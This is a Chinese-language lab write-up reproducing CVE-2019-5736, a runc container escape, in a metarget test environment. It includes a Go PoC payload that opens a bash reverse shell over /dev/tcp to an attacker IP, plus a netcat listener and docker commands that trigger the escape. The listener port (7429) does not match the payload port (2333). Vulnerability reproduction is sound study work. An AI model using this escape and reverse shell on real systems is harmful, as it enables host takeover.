NOTE

For all exploit source code and more detailed information, see https://github.com/iridium-soda/container-escape-exploits .

漏洞分析

网上有很多相关内容,不再赘述.

环境准备

Ubuntu 18.04
metarget
另一台机器

环境搭建

sudo ./metarget cnv install cve-2019-5736
sudo apt install golang-go
go version

准备poc

git clone https://github.com/Frichetten/CVE-2019-5736-PoC.git

监听机器用ifconfig查看IP地址,并用netcat监听反弹shell

nc -lvnp 7429

编辑main.go,payload中填入监听机器的IP和端口

//...

func init() {
        flag.StringVar(&shellCmd, "shell", "", "Execute arbitrary commands")
        flag.Parse()
}

func main() {
        // This is the line of shell commands that will execute on the host
        var payload = "#!/bin/bash \n bash -i >& /dev/tcp/<attacker's ip>/2333 0>&1"
        // First we overwrite /bin/sh with the /proc/self/exe interpreter path
        fd, err := os.Create("/bin/sh")
        if err != nil {
                fmt.Println(err)
                return
        }
//...
    }

编译poc

sudo CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

由于需要手动改源码,需要在poc编译完成后手动编译Dockerfile

sudo docker build -t 5736 .

Exploit

运行exp

sudo  docker run -it --rm --name 2019-5736 5736 /bin/bash
./main 

在host的另一个tab上:

sudo docker exec -it 2019-5736 /bin/sh

如果逃逸成功,会看到下面的信息:

No help topic for '/bin/sh'

监听机器即可收到反弹shell

Tips

反复复现可能会导致包破损。用sudo dpkg --configure -a修复

Shell

sudo  docker run -it --rm --name 2019-5736 5736 /bin/bash
./main 

Listening

nc -lvnp 7429

Another tab

sudo docker exec -it 2019-5736 /bin/sh

本文采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。

CVE-2019-5736 复现writeup

NOTE

漏洞分析

环境准备

环境搭建

准备poc

Exploit

Tips

Shell